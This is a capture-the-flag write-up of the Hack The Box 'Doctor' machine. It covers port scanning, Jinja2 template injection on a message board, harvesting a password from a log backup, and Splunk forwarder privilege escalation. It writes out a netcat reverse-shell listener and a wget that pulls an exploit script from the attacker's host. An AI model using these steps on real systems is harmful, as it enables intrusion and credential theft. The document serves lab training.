I"3<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/1.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<hr />

<p><strong><span style="color:#06bf04">Introduction</span></strong></p>

<p>Doctor is easy level machine released on 26 September2020 on HacTheBox and created by <a href="https://www.hackthebox.eu/home/users/profile/94858">egotisticalSW</a></p>

<p><span style="color:#06bf04">The blog is for educational purposes only.</span></p>

<hr />

<p><strong><span style="color:#06bf04">Enumeration</span></strong></p>

<p><strong><span style="color:#06bf04">IP-: 10.10.10.209</span></strong></p>

<p>As always, I added IP In hosts file.</p>

<h2 id="lets-start-with-port-scanning">Lets start with Port Scanning</h2>
<h1 id="nmap">Nmap</h1>

<p><code class="language-plaintext highlighter-rouge">softwareuser@parrot:~ sudo nmap -sC -sS -sV -T4 -A -oN nmap/intial_scan doctor.htb </code></p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/2.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p><strong>-sC for default scripts</strong><br />
<strong>-sV for Version detection</strong><br />
<strong>-sS for SYN scan </strong><br />
<strong>-T4 for speeding up Scan</strong><br />
<strong>-A  for Advanced and Aggressive features</strong><br /> 
<strong>-oN for Output</strong><br /></p>

<hr />

<p><strong>lnmap is just my alias to print only open ports from result file
</strong></p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
8089/tcp open  ssl/http Splunkd httpd
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="web-page">Web Page</h1>

<p>A simple web page and links aren’t working</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/3.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>but we got a subdomain</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/4.png “</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>let’s add this domain to our hosts (/etc/hosts) file</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>Send us a message
info@doctors.htb

</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="doctorshtb">doctors.htb</h1>

<p>A Login and Register page</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/5.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Let’s register</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/6.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Let’s Login with email and password that we used to register</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/7.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Nothing it’s blank lets source-code and i found something linked with /archive</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/8.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="c">&lt;!--archive still under beta testing&lt;a class="nav-item nav-link" href="/archive"&gt;</span>Archive<span class="c">&lt;/a&gt;</span>--&gt;

</pre></td></tr></tbody></table></code></pre></div></div>

<p>Let’s check /archive</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/9.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>/archive is also blank page</p>

<p>but on webpage  we can see  a option of New Message</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/10.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Let’s Try to post a message with <code class="language-plaintext highlighter-rouge">&lt;h1&gt;</code> tag</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/11.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>and we get a response your post has been created</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/12.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>we can try to check it on /archive</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/13.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>as we can see our message is there  and on this point i was sure that i have to work bit more and i can execute command or payload at /archive lets try some other tags too</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/14.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Let’s post this Message</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/15.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>
<span class="nt">&lt;/title&gt;&lt;/item&gt;&lt;h1&gt;</span>software<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;/title&gt;&lt;/item&gt;&lt;h1&gt;</span>user<span class="nt">&lt;/h1&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>it worked</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/16.png “</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>source code</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/17.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>it’s vunlreable by SSTI(Server-Side Template Injection) Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. Read More about <a href="https://portswigger.net/web-security/server-side-template-injection">SSTI</a></p>

<p>we have to identify which template is web page using so  a picture from this <a href="https://portswigger.net/research/server-side-template-injection">article</a> explains everything easily</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/18.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>so i started trying every payload to find out which template is web app using 
and finally i found thats Jinja2 with this payload ` curly bracket curly bracket 5*apostrophe5apostrophe  curly bracket curly bracket ` for more about check this <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection">jinja2</a> let’s try other payload to confirm that is jinja2 hehe</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/19.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>let’s check /archive again</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/20.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>thats working now i have to Exploit the SSTI by calling Popen without guessing the offset</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/21.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<h1 id="payload">Payload</h1>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/payload.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Let’s create a new message with payload</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/22.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Let’s post Message</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/23.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>now let’s access the /archive we got a shell as web@doctor</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/24.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<h1 id="web-shell">Web (Shell)</h1>

<p>we don’t have permission to read user.txt we have tp enumerate more after some time i found some log files but there is an backup so i found creds in that file of probably user shaun because shaun contains our user.txt</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/25.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>cat backup | grep -iE "password" 
</pre></td></tr></tbody></table></code></pre></div></div>

<p>got user</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/26.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<h1 id="root-part">Root Part</h1>

<p>As always i will run <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS">linPEAS</a> after running linPEAS i found splunk is running</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/27.png”</td>
      <td>relative_url }}})</td>
    </tr>
  </tbody>
</table>

<p>Splunk forwarder is one of the components of splunk infrastructure. Splunk forwarder basically acts as agent for log collection from remote machines .Splunk forwarder collects logs from remote machines and forward s them to indexer (Splunk database) for further processing and storage. Read more about splunk here <a href="https://www.learnsplunk.com/splunk-forwarder-install.html">splunk</a></p>

<p>![Desktop View]({{ “/assets/img/htb-machines/doctor/splunk-py.png”}})</p>

<p>After googling i found an script which can be used here for privilege escalation <a href="https://github.com/DaniloCaruso/SplunkWhisperer2/tree/master/PySplunkWhisperer2">PySplunkWhisperer2</a></p>

<h1 id="pysplunkwhisperer2">PySplunkWhisperer2</h1>
<hr />

<p>we have to start a netcat listener and then we have to run PySplunkWhisperer2 on our system</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>nc -lnvp 5006 # you'r machine
python3 -m http.server 80 # you'r machine
wget http://10.10.xx.xxx:80/PySplunkWhisperer2_remote.py # you'r machine

</pre></td></tr></tbody></table></code></pre></div></div>

<p>Let’s run netcat listener</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{{ “/assets/img/htb-machines/doctor/29.png”</td>
      <td>relative_url }}})</td>
    </tr>
  </tbody>
</table>

<p>Let’s run PySplunkWhisperer2 to get shell</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{ “/assets/img/htb-machines/doctor/30.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>payload</p>

<table>
  <tbody>
    <tr>
      <td>![Desktop View]({{{ “/assets/img/htb-machines/doctor/paysplunk.png”</td>
      <td>relative_url }}})</td>
    </tr>
  </tbody>
</table>

<p>we got a shell</p>

<p>![Desktop View]({{ “/assets/img/htb-machines/doctor/31.png” relative_url}})</p>

<p>now we can read root.txt</p>

<p>![Desktop View]({{ “/assets/img/htb-machines/doctor/32.png” relative_url}})</p>

<p>Thank you for reading my blog if you have any suggestions feel free to contact me on twitter.</p>

<hr />
:ET